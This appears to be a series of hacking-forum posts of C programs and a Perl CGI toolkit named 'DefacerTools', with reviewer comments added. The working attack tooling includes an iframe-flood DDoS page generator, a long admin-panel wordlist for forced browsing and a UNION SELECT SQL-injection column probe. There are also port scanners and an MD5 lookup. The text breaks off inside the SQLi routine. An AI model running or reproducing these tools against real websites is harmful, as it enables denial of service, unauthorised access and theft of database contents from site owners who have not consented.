#include<unistd.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#include<netdb.h>

/* Print the program banner. */
void head() {
  fputs("\n-- == ScanPort 0.1 == --\n", stdout);
}

/* Print the closing credit line. */
void end() {
  fputs("\n\nWritten By Doddy H\n\n", stdout);
}

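/*
 * Usage: port <ip> <portstart> <portend>
 *
 * Attempts a blocking TCP connect() to every port in [portstart, portend)
 * on the given IPv4 address and prints the ports that accept.
 *
 * Fixes over the original listing:
 *   - every socket is closed after its attempt (the original leaked one
 *     descriptor per port and stopped working once the process limit was
 *     reached);
 *   - socket() failures are reported instead of being passed to connect();
 *   - the address and the port range are validated before use;
 *   - the address structure is zero-initialised and cast to the type
 *     connect() expects (struct sockaddr *).
 */
int main(int argc,char **argv) {

  const char *ip;
  int port, fd, portstart, portend;
  struct sockaddr_in addr = {0};

  head();
  if (argc != 4) {
    printf("\n[+] sintax : port <ip> <portstart> <portend>");
  } else {
    ip = argv[1];
    portstart = atoi(argv[2]);
    portend = atoi(argv[3]);

    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr(ip);

    if (addr.sin_addr.s_addr == INADDR_NONE) {
      /* inet_addr() only accepts dotted IPv4 notation, not host names. */
      printf("\n[-] Invalid IPv4 address : %s\n", ip);
    } else if (portstart < 0 || portend > 65536 || portstart > portend) {
      /* The upper bound is exclusive, so 65536 is the largest useful value. */
      printf("\n[-] Invalid port range : %d-%d\n", portstart, portend);
    } else {
      printf("\n[+] Scanning %s\n", ip);
      printf("\n[+] Parameters : %d-%d\n", portstart, portend);
      for (port = portstart; port < portend; port++) {
        addr.sin_port = htons((unsigned short)port);
        fd = socket(AF_INET, SOCK_STREAM, 0);
        if (fd < 0) {
          perror("socket");
          break;
        }
        if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)) == 0) {
          printf("\n[+] Port Found : %d", port);
        }
        close(fd);
      }
    }
  }
  end();
  return 0;
}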

/** The End ? **/

#324
Programación C/C++ / [C] ResolveIP
8 Enero 2012, 18:41 PM
Un simple programa para saber la IP de cualquier host.


/**
* ResolveIP 0.1
* Written By Doddy H
* Thanks to CrashCool
*/

#include <winsock.h>
#include <stdio.h>

/* Print the program banner. */
void head() {
  fputs("\n -- == ResolveIP 0.1 == --\n\n", stdout);
}

/* Print the closing credit line. */
void end() {
  fputs("\n\n -- == Written By Doddy H == --\n", stdout);
}

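/*
 * Usage: resolve <host>
 *
 * Resolves the host name with gethostbyname() and prints the canonical name
 * and the first IPv4 address. Returns 1 when Winsock cannot be started or
 * the name cannot be resolved, 0 otherwise.
 *
 * Fixes over the original listing: the WSAStartup() result is checked,
 * WSACleanup() is called on every path after a successful start-up, the
 * address entry is checked before it is dereferenced, and the error path
 * returns from main instead of calling exit(), which was used without
 * including <stdlib.h>.
 */
int main(int argc, char *argv[]) {
  char *dom,*host,*ip;
  struct hostent *entry;
  WSADATA wsa;
  int status = 0;

  head();

  if (argc != 2) {
    printf("\n[+] Sintax : resolve <host>\n");
  } else if (WSAStartup(MAKEWORD(1,1),&wsa) != 0) {
    printf("\n[-] Error\n");
    status = 1;
  } else {
    dom = argv[1];
    entry = gethostbyname(dom);
    if (entry == NULL || entry->h_addrtype != AF_INET
        || entry->h_addr_list[0] == NULL) {
      printf("\n[-] Error\n");
      status = 1;
    } else {
      host = entry->h_name;
      /* inet_ntoa() returns a static buffer; print it before any reuse. */
      ip = inet_ntoa(*((struct in_addr *)entry->h_addr_list[0]));
      printf("\n[+] HOST : %s",host);
      printf("\n[+] IP : %s\n",ip);
    }
    WSACleanup();
  }
  end();
  return status;
}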

/* The End */
#325
Programación C/C++ / [C] Manager
8 Enero 2012, 18:40 PM
Un simple programa para manejar los procesos de Windows.



/**
Simple process manager
Coded By Doddy H
**/

#include <windows.h>
#include <Tlhelp32.h>
#include <stdio.h>

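/*
 * Interactive menu: 1 lists the running processes, 2 terminates a process
 * by PID, 3 exits.
 *
 * Fixes over the original listing:
 *   - PROCESSENTRY32.dwSize is set before Process32First(), which the API
 *     requires;
 *   - the entry returned by Process32First() is printed too (it used to be
 *     skipped);
 *   - the snapshot and process handles are checked before use, and NULL is
 *     never passed to TerminateProcess()/CloseHandle();
 *   - scanf() results are checked, so non-numeric input no longer makes the
 *     menu spin forever;
 *   - exit() (used without <stdlib.h>) is replaced by returning from main
 *     with the same status.
 */
int main() {
  HANDLE snapshot, target;
  PROCESSENTRY32 entry;
  int re, pid, ch;

  printf("\n\n-- == Manager == --\n\n");
  printf("1 - Show Process\n");
  printf("2 - Close Process\n");
  printf("3 - Exit\n\n");

  while (1) {
    printf("[Option] : ");
    if (scanf("%d",&re) != 1) {
      /* Drop the rest of the bad line; stop on end of input. */
      while ((ch = getchar()) != '\n' && ch != EOF) {
      }
      if (ch == EOF) {
        return 1;
      }
      continue;
    }

    if (re == 1) {
      printf("\n[+] Getting process..\n\n");
      snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
      if (snapshot == INVALID_HANDLE_VALUE) {
        printf("\n[-] Error\n\n");
        continue;
      }
      entry.dwSize = sizeof(entry);
      if (Process32First(snapshot,&entry)) {
        do {
          printf("[+] Process : %s \n",entry.szExeFile);
          printf("[+] PID : %lu\n\n",(unsigned long)entry.th32ProcessID);
        } while (Process32Next(snapshot,&entry));
      }
      CloseHandle(snapshot);
    }
    else if (re == 2) {
      printf("\n[PID] : ");
      if (scanf("%d",&pid) != 1) {
        while ((ch = getchar()) != '\n' && ch != EOF) {
        }
        printf("\n[-] Error\n\n");
        continue;
      }
      /* Only the right to terminate is requested on the handle. */
      target = OpenProcess(PROCESS_TERMINATE,0,(DWORD)pid);
      if (target == NULL) {
        printf("\n[-] Error\n\n");
        return 1;
      }
      if (TerminateProcess(target,0)) {
        printf("\n[+] Process Closed\n\n");
      } else {
        printf("\n[-] Error\n\n");
        CloseHandle(target);
        return 1;
      }
      CloseHandle(target);
    }
    else if (re == 3) {
      setbuf (stdin,NULL);
      printf("\n\nWritten By Doddy H\n\n");
      getchar();
      return 1;
    }
  }
  return 0;
}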

/** The End ? **/
#326
Programación C/C++ / [C] Iframe DDOS
8 Enero 2012, 18:38 PM
Un simple POC para iframe DDOS



/**
* Simple POC for IFRAME DDOS
* Coded By Doddy H
*/

#include <stdio.h>

/* Print the program banner. */
void head() {
  fputs("\n -- == IFRAME DDOS 0.1 == --\n\n", stdout);
}

/* Print the closing credit line. */
void end() {
  fputs("\n\n -- == Coded By Doddy H == --\n", stdout);
}

/*
 * Usage: ddos <target> <count>
 *
 * Appends count + 1 small <iframe> elements (the loop bound is inclusive),
 * each with <target> as its src, to poc.html in the current directory.
 * The target string is written into the attribute unescaped and the result
 * of fopen() is not checked.
 *
 * Defender note: a browser that opens the generated page requests the target
 * once per iframe, so on the receiving side this is ordinary HTTP GET load;
 * rate limiting and caching are the controls that apply.
 */
int main ( int argc, char **argv ) {
  char *target;
  int i,count;
  FILE *archivo;

  head();
  if(argc != 3) {
    printf("\n[+] Sintax : ddos <target> <count>\n");
  } else {
    target = argv[1];
    count = atoi(argv[2]);
    printf("\n[+] Starting the party");
    /* "a+" appends: repeated runs keep growing the same file. */
    archivo = fopen ("poc.html","a+");
    for(i=0;i<=count;i++) {                         
      fprintf(archivo,"%s","<iframe src='");
      fprintf(archivo,"%s",target);
      fprintf(archivo,"%s","' width='3' height='3'></iframe><br>\n");
    }
    fclose(archivo);   
    printf("\n[+] Finished\n");
  }     
  end();
  return 0;
}

/** The End ? */
#327
Programación C/C++ / [C] Hex Converter
8 Enero 2012, 18:37 PM
Un simple programa para convertir texto en hex


/**
* Hex Converter
* Coded By Doddy H
* Based in hex encoder by Ka0x
*/

#include <stdio.h>
#include <string.h>

/* Print the program banner. */
void head() {
  fputs("\n -- == Hex Converter == --\n\n", stdout);
}

/* Print the closing credit line. */
void end() {
  fputs("\n\n\n -- == Coded By Doddy H == --\n", stdout);
}

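/*
 * Usage: hex <text>
 *
 * Prints the argument followed by its bytes as one hexadecimal string
 * prefixed with "0x".
 *
 * Fixes over the original listing: each byte is converted through
 * unsigned char and printed with "%02x". With plain "%x" on a char, bytes
 * below 0x10 lost their leading zero and, where char is signed, bytes
 * above 0x7f were sign-extended to eight digits, so the output could not
 * be decoded back.
 */
int main ( int argc, char **argv ) {
  const char *text;
  size_t i,total;

  head();
  if (argc != 2) {
    printf("\n[+] Sintax : hex <text>");
  } else {
    text = argv[1];
    total = strlen(text);
    printf("\n[Text] : %s\n",text);
    printf("[Encode] : 0x");
    for (i = 0; i < total; i++) {
      printf("%02x",(unsigned char)text[i]);
    }
  }
  end();
  return 0;
}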

/** The End ? */

#328
Hola, acá les traigo un regalo de Navidad que hice en 3 horas: es un programa CGI para usar en webs que
lo soporten. Hice todas las pruebas con XAMPP y, al parecer, todo funciona bien.

Las funciones del programa son :

  • HexConverter
  • PanelFinder
  • PathsFinder
  • SQLi Scanner
  • FuzzDNS
  • FinderPass
  • PortScanner

    El código del programa (formateado con perltidy) es:

    defacertools.cgi

    Código (perl) [Seleccionar]

    #!"\xampp\perl\bin\perl.exe"
    #
    #DefacerTools 0.5
    #
    #(C) Doddy Hackman 2012
    #
    #

    use CGI;
    use LWP::UserAgent;
    use URI::Split qw(uri_split);
    use HTML::LinkExtor;
    use IO::Socket;

    # Wordlist of relative admin/login paths. The 'buscarpanel' branch of the
    # dispatcher appends each entry to the submitted base URL, requests it once
    # through tomax() and lists the entries that answer with a success status.
    # Declared without `my`, so this is a package global.
    # Defender view: these paths requested in one burst by a single client,
    # all carrying the fixed Firefox/2.0.0.12 User-Agent string configured on
    # $nave, is a forced-browsing pattern worth alerting on in web-server logs.
    @panels = (
        'admin/admin.asp',               'admin/login.asp',
        'admin/index.asp',               'admin/admin.aspx',
        'admin/login.aspx',              'admin/index.aspx',
        'admin/webmaster.asp',           'admin/webmaster.aspx',
        'asp/admin/index.asp',           'asp/admin/index.aspx',
        'asp/admin/admin.asp',           'asp/admin/admin.aspx',
        'asp/admin/webmaster.asp',       'asp/admin/webmaster.aspx',
        'admin/',                        'login.asp',
        'login.aspx',                    'admin.asp',
        'admin.aspx',                    'webmaster.aspx',
        'webmaster.asp',                 'login/index.asp',
        'login/index.aspx',              'login/login.asp',
        'login/login.aspx',              'login/admin.asp',
        'login/admin.aspx',              'administracion/index.asp',
        'administracion/index.aspx',     'administracion/login.asp',
        'administracion/login.aspx',     'administracion/webmaster.asp',
        'administracion/webmaster.aspx', 'administracion/admin.asp',
        'administracion/admin.aspx',     'php/admin/',
        'admin/admin.php',               'admin/index.php',
        'admin/login.php',               'admin/system.php',
        'admin/ingresar.php',            'admin/administrador.php',
        'admin/default.php',             'administracion/',
        'administracion/index.php',      'administracion/login.php',
        'administracion/ingresar.php',   'administracion/admin.php',
        'administration/',               'administration/index.php',
        'administration/login.php',      'administrator/index.php',
        'administrator/login.php',       'administrator/system.php',
        'system/',                       'system/login.php',
        'admin.php',                     'login.php',
        'administrador.php',             'administration.php',
        'administrator.php',             'admin1.html',
        'admin1.php',                    'admin2.php',
        'admin2.html',                   'yonetim.php',
        'yonetim.html',                  'yonetici.php',
        'yonetici.html',                 'adm/',
        'admin/account.php',             'admin/account.html',
        'admin/index.html',              'admin/login.html',
        'admin/home.php',                'admin/controlpanel.html',
        'admin/controlpanel.php',        'admin.html',
        'admin/cp.php',                  'admin/cp.html',
        'cp.php',                        'cp.html',
        'administrator/',                'administrator/index.html',
        'administrator/login.html',      'administrator/account.html',
        'administrator/account.php',     'administrator.html',
        'login.html',                    'modelsearch/login.php',
        'moderator.php',                 'moderator.html',
        'moderator/login.php',           'moderator/login.html',
        'moderator/admin.php',           'moderator/admin.html',
        'moderator/',                    'account.php',
        'account.html',                  'controlpanel/',
        'controlpanel.php',              'controlpanel.html',
        'admincontrol.php',              'admincontrol.html',
        'adminpanel.php',                'adminpanel.html',
        'admin1.asp',                    'admin2.asp',
        'yonetim.asp',                   'yonetici.asp',
        'admin/account.asp',             'admin/home.asp',
        'admin/controlpanel.asp',        'admin/cp.asp',
        'cp.asp',                        'administrator/index.asp',
        'administrator/login.asp',       'administrator/account.asp',
        'administrator.asp',             'modelsearch/login.asp',
        'moderator.asp',                 'moderator/login.asp',
        'moderator/admin.asp',           'account.asp',
        'controlpanel.asp',              'admincontrol.asp',
        'adminpanel.asp',                'fileadmin/',
        'fileadmin.php',                 'fileadmin.asp',
        'fileadmin.html',                'administration.html',
        'sysadmin.php',                  'sysadmin.html',
        'phpmyadmin/',                   'myadmin/',
        'sysadmin.asp',                  'sysadmin/',
        'ur-admin.asp',                  'ur-admin.php',
        'ur-admin.html',                 'ur-admin/',
        'Server.php',                    'Server.html',
        'Server.asp',                    'Server/',
        'wp-admin/',                     'administr8.php',
        'administr8.html',               'administr8/',
        'administr8.asp',                'webadmin/',
        'webadmin.php',                  'webadmin.asp',
        'webadmin.html',                 'administratie/',
        'admins/',                       'admins.php',
        'admins.asp',                    'admins.html',
        'administrivia/',                'Database_Administration/',
        'WebAdmin/',                     'useradmin/',
        'sysadmins/',                    'admin1/',
        'system-administration/',        'administrators/',
        'pgadmin/',                      'directadmin/',
        'staradmin/',                    'ServerAdministrator/',
        'SysAdmin/',                     'administer/',
        'LiveUser_Admin/',               'sys-admin/',
        'typo3/',                        'panel/',
        'cpanel/',                       'cPanel/',
        'cpanel_file/',                  'platz_login/',
        'rcLogin/',                      'blogindex/',
        'formslogin/',                   'autologin/',
        'support_login/',                'meta_login/',
        'manuallogin/',                  'simpleLogin/',
        'loginflat/',                    'utility_login/',
        'showlogin/',                    'memlogin/',
        'members/',                      'login-redirect/',
        'sub-login/',                    'wp-login/',
        'login1/',                       'dir-login/',
        'login_db/',                     'xlogin/',
        'smblogin/',                     'customer_login/',
        'UserLogin/',                    'login-us/',
        'acct_login/',                   'admin_area/',
        'bigadmin/',                     'project-admins/',
        'phppgadmin/',                   'pureadmin/',
        'sql-admin/',                    'radmind/',
        'openvpnadmin/',                 'wizmysqladmin/',
        'vadmind/',                      'ezsqliteadmin/',
        'hpwebjetadmin/',                'newsadmin/',
        'adminpro/',                     'Lotus_Domino_Admin/',
        'bbadmin/',                      'vmailadmin/',
        'Indy_admin/',                   'ccp14admin/',
        'irc-macadmin/',                 'banneradmin/',
        'sshadmin/',                     'phpldapadmin/',
        'macadmin/',                     'administratoraccounts/',
        'admin4_account/',               'admin4_colon/',
        'radmind-1/',                    'Super-Admin/',
        'AdminTools/',                   'cmsadmin/',
        'SysAdmin2/',                    'globes_admin/',
        'cadmins/',                      'phpSQLiteAdmin/',
        'navSiteAdmin/',                 'server_admin_small/',
        'logo_sysadmin/',                'server/',
        'database_administration/',      'power_user/',
        'system_administration/',        'ss_vms_admin_sm/'
    );

    # Host-name prefixes tried by the 'buscardns' branch; only "www" is active.
    my @dns = qw(www);

    #my @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');

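    # Shared HTTP client used by toma(), tomax() and tomar() for every
    # outbound request this script makes.
    my $nave = LWP::UserAgent->new;
    $nave->agent(
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
    );
    $nave->timeout(5);

    # Every URL fetched below is built from a client-supplied parameter. LWP
    # dispatches on the URL scheme, so restrict the client to web schemes;
    # a submitted value then cannot select any other protocol handler on the
    # machine hosting this script.
    $nave->protocols_allowed( [ 'http', 'https' ] );

    # Submitted parameters, first value of each, keyed by parameter name.
    # Nothing is validated here; every consumer must treat the values as
    # untrusted.
    my %rta;

    # Direct method call instead of the indirect-object form `new CGI`.
    my $que  = CGI->new;
    my @ques = $que->param;

    for my $nombre (@ques) {
        $rta{$nombre} = $que->param($nombre);
    }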

    # Emit the CGI response header, then the inline stylesheet shared by every
    # page the script renders. This runs unconditionally, before the request
    # is dispatched. The header carries no charset.
    print "Content-type:text/html\n\n";
    print "

    <style type=text/css>


    .main {
    margin : -287px 0px 0px -490px;
    border : White solid 1px;
    BORDER-COLOR: #00FF00;
    }

    #pie {
    position: absolute;
    bottom: 0;
    }

    body,a:link {
    font: normal 16px Verdana, Arial, Helvetica,
    sans-serif;
    background-color: #000000;
    color:#00FF00;
    Courier New;
    cursor:crosshair;
    font-size: small;
    }

    input,table.outset,table.bord,table,textarea,select {
    background-color:black;color:#00FF00;
    border: solid 1px #00FF00;
    border-color:#00FF00
    }

    a:link,a:visited,a:active {
    color: #00FF00;
    font: normal 16px Verdana, Arial, Helvetica,
    sans-serif;
    text-decoration: none;
    }

    </style>";

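    # Request dispatcher: the first parameter found in %rta selects a tool.
    # Each tool has a "form" parameter (hex, panelfinder, ...) that renders the
    # input form and an "action" parameter (textocode, buscarpanel, ...) that
    # runs it. Anything else renders the home menu.
    #
    # Client-supplied values and text taken from remote responses are passed
    # through escapeHTML() before being printed; the original echoed them raw,
    # which let a crafted parameter or remote page inject markup into this
    # page. Values interpolated into a regex are quoted with \Q...\E so they
    # are matched literally instead of being compiled as patterns.
    #
    # NOTE(review): nothing here authenticates the caller. Whoever can reach
    # the script can make this host issue HTTP requests and TCP connections to
    # destinations of their choosing, so access to it has to be restricted at
    # the web-server level.
    if ( $rta{'hex'} ) {
        logouno();
        print
    qq(<form method=post action=''><b>Text to encode : </b><input type=text name=textocode value=test><input type=submit name=codificar value=Encode></form>);
        copyright();
    }
    elsif ( $rta{'textocode'} ) {
        logouno();

        # encode() yields "0x" followed by hex digits only, so no escaping.
        print "[+] Encode : <b>" . encode( $rta{'textocode'} ) . "</b><br><br>";
        print "</center>";
        copyright();
    }
    elsif ( $rta{'panelfinder'} ) {
        logodos();
        print
    qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpanel value=http://localhost/><input type=submit value=Find></form>);
        copyright();
    }
    elsif ( $rta{'buscarpanel'} ) {

        my $page      = $rta{'buscarpanel'};
        my $page_html = $que->escapeHTML($page);
        logodos();
        print "<br>[+] Scanning $page_html<br><br>";
        for my $path (@panels) {
            my $code = tomax( $page . "/" . $path );
            if ( $code->is_success ) {

                # $path comes from the fixed @panels list; only $page is untrusted.
                print "[Link] : " . $page_html . "/" . $path . "<br>";
            }
        }
        print "<br><br>[+] Finish<br>";
        copyright();
    }
    elsif ( $rta{'pathsfinder'} ) {
        logotres();
        print
    qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpaths value=http://localhost/doddy><input type=submit name=codificar value=Find></form>);
        copyright();
    }
    elsif ( $rta{'buscarpaths'} ) {
        logotres();

        my $page = $rta{'buscarpaths'};

        my $code  = toma($page);
        my @links = get_links($code);

        # Space-separated list of directory prefixes already requested.
        my $repetidos = '';

        print "<br><br>[+] Finding paths<br><br>";

        for my $com (@links) {
            my ( undef, undef, $page_path ) = uri_split($page);
            if ( $page_path =~ /\/(.*)$/ ) {
                my $path1 = $1;

                # Literal removal: $path1 is client-controlled text.
                $page =~ s/\Q$path1\E//ig;
                my ( undef, $auth, $link_path ) = uri_split($com);
                if ( $link_path =~ /(.*)\// ) {
                    my $parche = $1;

                    # $parche comes from the fetched page, i.e. from a third party.
                    unless ( $repetidos =~ /\Q$parche\E/ ) {
                        $repetidos .= " " . $parche;
                        my $listing = toma( "http://" . $auth . $parche );

                        if ( $listing =~ /Index of (.*)</ig ) {
                            my $dir_found = $1;
                            chomp $dir_found;
                            print "[+] Directory Found : "
                              . $que->escapeHTML("$page/$dir_found") . "<br>";
                        }
                    }
                }
            }
        }
        print "<br><br>[+]Finished<br>";
        copyright();
    }
    elsif ( $rta{'sqliscanner'} ) {
        logocuatro();
        print
    qq(<form method=post action=''><b>Page : </b><input type=text name=buscarsql value=http://localhost/sql.php?id=><input type=submit name=codificar value=Scan></form>);
        copyright();
    }
    elsif ( $rta{'buscarsql'} ) {
        logocuatro();
        print "<br><br>[+] Scanning page<br><br>";

        # The & sigil selects the sub named length defined in this file rather
        # than the builtin of the same name.
        &length( $rta{'buscarsql'} );
        print "<br><br>[+] Finished";
        copyright();
    }
    elsif ( $rta{'fuzzdns'} ) {
        logocinco();
        print
    qq(<form method=post action=''><b>Host : </b><input type=text name=buscardns value=google.com><input type=submit name=codificar value=Scan></form>);
        copyright();
    }
    elsif ( $rta{'buscardns'} ) {
        logocinco();

        my $page      = $rta{'buscardns'};
        my $page_html = $que->escapeHTML($page);

        print "<br><br>[+] Searching DNS to " . $page_html . ".....<br><br><br>";
        for my $path (@dns) {
            my $code = tomax( "http://" . $path . "." . $page );
            if ( $code->is_success ) {
                print "[+] Found : http://" . $path . "." . $page_html . "<br>";
            }
        }
        print "<br><br>[+] Finished<br><br>";
        copyright();
    }
    elsif ( $rta{'finderpass'} ) {
        logoseis();
        print
    qq(<form method=post action=''><b>MD5 : </b><input type=text name=buscarhash value=202cb962ac59075b964b07152d234b70><input type=submit name=codificar value=Scan></form>);
        copyright();
    }
    elsif ( $rta{'buscarhash'} ) {
        logoseis();
        &crackit( $rta{'buscarhash'} );
        copyright();
    }
    elsif ( $rta{'portscanner'} ) {
        logosiete();
        print
    qq(<form method=post action=''><b>IP : </b><input type=text name=buscarpuertos value=localhost><input type=submit name=codificar value=Scan></form>);
        copyright();
    }
    elsif ( $rta{'buscarpuertos'} ) {
        logosiete();
        scanuno( $rta{'buscarpuertos'} );
        copyright();
    }
    else {

        # 'home', no parameter and any unrecognised parameter all land here.
        sintax();
    }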

    # Render the home page: page title, heading and a one-column table whose
    # rows link to each tool's input form through a query parameter.
    sub sintax {
        my $menu = qq(
    <title>DefacerTools 0.5 (C) Doddy Hackman 2012</title>
    <br><br>
    <h1><center>DefacerTools</center></h1>
    <br><br>
    <center>
    <table border=1>
    <td class=main><center><b>Tools</b></center></td><tr>
    <td class=main><a href=?hex=true><center>HexConverter</center></a></td><tr>
    <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr>
    <td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr>
    <td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr>
    <td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr>
    <td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr>
    <td class=main><a href=?portscanner=true><center>PortScanner</center></a></td>
    </table>
    </center>
    );
        print $menu;
    }

    # Banner for the hex-encoder pages: prints an opening <center> tag and a
    # <pre> block of ASCII art. The <center> element is not closed here.
    sub logouno {
        print qq(
    <center>
    <pre>



    @    @                 @@@@                                       
    @    @                @    @                            @         
    @    @                @                                 @         
    @    @   @@@  @  @    @       @@@  @ @@  @   @  @@@  @@ @@  @@@  @@
    @@@@@@  @   @ @  @    @      @   @ @@  @ @   @ @   @ @  @  @   @ @
    @    @  @@@@@  @@     @      @   @ @   @  @ @  @@@@@ @  @  @@@@@ @
    @    @  @      @@     @      @   @ @   @  @ @  @     @  @  @     @
    @    @  @   @ @  @    @    @ @   @ @   @   @   @   @ @  @  @   @ @
    @    @   @@@  @  @     @@@@   @@@  @   @   @    @@@  @   @  @@@  @




    </pre>


    );
    }

    # Banner for the panel-finder pages: prints an opening <center> tag and a
    # <pre> block of ASCII art. The <center> element is not closed here.
    sub logodos {
        print qq(
    <center>
    <pre>



    @@@@@                    @ @@@@@ @           @         
    @    @                   @ @                 @         
    @    @                   @ @                 @         
    @    @  @@@  @ @@   @@@  @ @     @ @ @@   @@@@  @@@  @@
    @@@@@      @ @@  @ @   @ @ @@@@  @ @@  @ @   @ @   @ @
    @       @@@@ @   @ @@@@@ @ @     @ @   @ @   @ @@@@@ @
    @      @   @ @   @ @     @ @     @ @   @ @   @ @     @
    @      @   @ @   @ @   @ @ @     @ @   @ @   @ @   @ @
    @       @@@@ @   @  @@@  @ @     @ @   @  @@@@  @@@  @




    </pre>


    );
    }

    # Banner for the paths-finder pages: prints an opening <center> tag and a
    # <pre> block of ASCII art. The <center> element is not closed here.
    sub logotres {
        print qq(
    <center>
    <pre>



    @@@@@           @          @@@@@ @           @         
    @    @       @  @          @                 @         
    @    @       @  @          @                 @         
    @    @  @@@  @@ @ @@   @@  @     @ @ @@   @@@@  @@@  @@
    @@@@@      @ @  @@  @ @  @ @@@@  @ @@  @ @   @ @   @ @
    @       @@@@ @  @   @  @   @     @ @   @ @   @ @@@@@ @
    @      @   @ @  @   @   @  @     @ @   @ @   @ @     @
    @      @   @ @  @   @ @  @ @     @ @   @ @   @ @   @ @
    @       @@@@  @ @   @  @@  @     @ @   @  @@@@  @@@  @





    </pre>


    );
    }

    # Banner for the SQLi-scanner pages: prints an opening <center> tag and a
    # <pre> block of ASCII art. The <center> element is not closed here.
    sub logocuatro {
        print qq(
    <center>
    <pre>



      @@@    @@@@   @     @      @@@                                   
    @   @  @    @  @     @     @   @                                 
    @      @    @  @     @     @                                     
    @      @    @  @     @     @       @@@   @@@  @ @@  @ @@   @@@  @@
      @@@   @    @  @     @      @@@   @   @     @ @@  @ @@  @ @   @ @
         @  @    @  @     @         @  @      @@@@ @   @ @   @ @@@@@ @
         @  @  @ @  @     @         @  @     @   @ @   @ @   @ @     @
    @   @  @   @@  @     @     @   @  @   @ @   @ @   @ @   @ @   @ @
      @@@    @@@@   @@@@@ @      @@@    @@@   @@@@ @   @ @   @  @@@  @
                 @                                                     





    </pre>


    );
    }

    # Banner for the FuzzDNS pages: prints an opening <center> tag and a
    # <pre> block of ASCII art. The <center> element is not closed here.
    sub logocinco {
        print qq(
    <center>
    <pre>



    @@@@@                    @@@@    @    @   @@@
    @                        @   @   @@   @  @   @
    @                        @    @  @@   @  @   
    @     @   @ @@@@ @@@@    @    @  @ @  @  @   
    @@@@  @   @    @    @    @    @  @ @  @   @@@
    @     @   @   @    @     @    @  @  @ @      @
    @     @   @  @    @      @    @  @   @@      @
    @     @  @@ @    @       @   @   @   @@  @   @
    @      @@ @ @@@@ @@@@    @@@@    @    @   @@@






    </pre>


    );
    }

    # Banner for the FinderPass pages: prints an opening <center> tag and a
    # <pre> block of ASCII art. The <center> element is not closed here.
    sub logoseis {
        print qq(
    <center>
    <pre>



    @@@@@ @           @          @@@@@                 
    @                 @          @    @               
    @                 @          @    @               
    @     @ @ @@   @@@@  @@@  @@ @    @  @@@   @@   @@
    @@@@  @ @@  @ @   @ @   @ @  @@@@@      @ @  @ @  @
    @     @ @   @ @   @ @@@@@ @  @       @@@@  @    @ 
    @     @ @   @ @   @ @     @  @      @   @   @    @
    @     @ @   @ @   @ @   @ @  @      @   @ @  @ @  @
    @     @ @   @  @@@@  @@@  @  @       @@@@  @@   @@







    </pre>


    );
    }

    # Banner for the port-scanner pages: prints an opening <center> tag and a
    # <pre> block of ASCII art. The <center> element is not closed here.
    sub logosiete {
        print qq(
    <center>
    <pre>



    @@@@@               @@@                                   
    @    @          @  @   @                                 
    @    @          @  @                                     
    @    @  @@@  @@ @@ @       @@@   @@@  @ @@  @ @@   @@@  @@
    @@@@@  @   @ @  @   @@@   @   @     @ @@  @ @@  @ @   @ @
    @      @   @ @  @      @  @      @@@@ @   @ @   @ @@@@@ @
    @      @   @ @  @      @  @     @   @ @   @ @   @ @     @
    @      @   @ @  @  @   @  @   @ @   @ @   @ @   @ @   @ @
    @       @@@  @   @  @@@    @@@   @@@@ @   @ @   @  @@@  @








    </pre>


    );
    }

    # Page footer: spacing followed by a centred link back to the home menu.
    sub copyright {
        my $pie =
    qq(<br><br><br><br><br><br><br><center><a href=?home=true><b>Return to home</b></a></center><br><br>);
        print $pie;
    }

    # Column-count probe used by the 'buscarsql' branch. For every width from
    # 2 to 200 it appends a UNION SELECT of char()-encoded marker values to the
    # submitted URL, fetches the result with toma() and looks for the marker
    # text in the response body. On a match it prints the request that matched
    # and hands a template of it to details().
    #
    # $_[0] - base URL taken from the request parameter.
    # $_[1] - separator mode for bypass(); the visible caller passes only one
    #         argument, so bypass() falls through to its default pair.
    #
    # The sub shares its name with the builtin length, which is why the caller
    # invokes it as &length(...). $pass1, $pass2, $alert, $total, $injection,
    # $test, @number and $control are package globals, not lexicals.
    #
    # NOTE(review): $page is echoed into the HTML output without escaping.
    # NOTE(review): the loop does not stop after a match; all 199 requests are
    # sent regardless.
    # Defender view: the marker travels as char(...) code lists, so it is not
    # visible as plain text in the request. What the target's logs show is a
    # run of requests from one client whose query string contains
    # "1=0 ... union ... select ... char(" with one more column each time.
    sub length {
        print "<br>[+] Looking for the number of columns<br><br>";
        my $rows = "0";
        my $asc;
        my $page = $_[0];
        ( $pass1, $pass2 ) = &bypass( $_[1] );

        $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
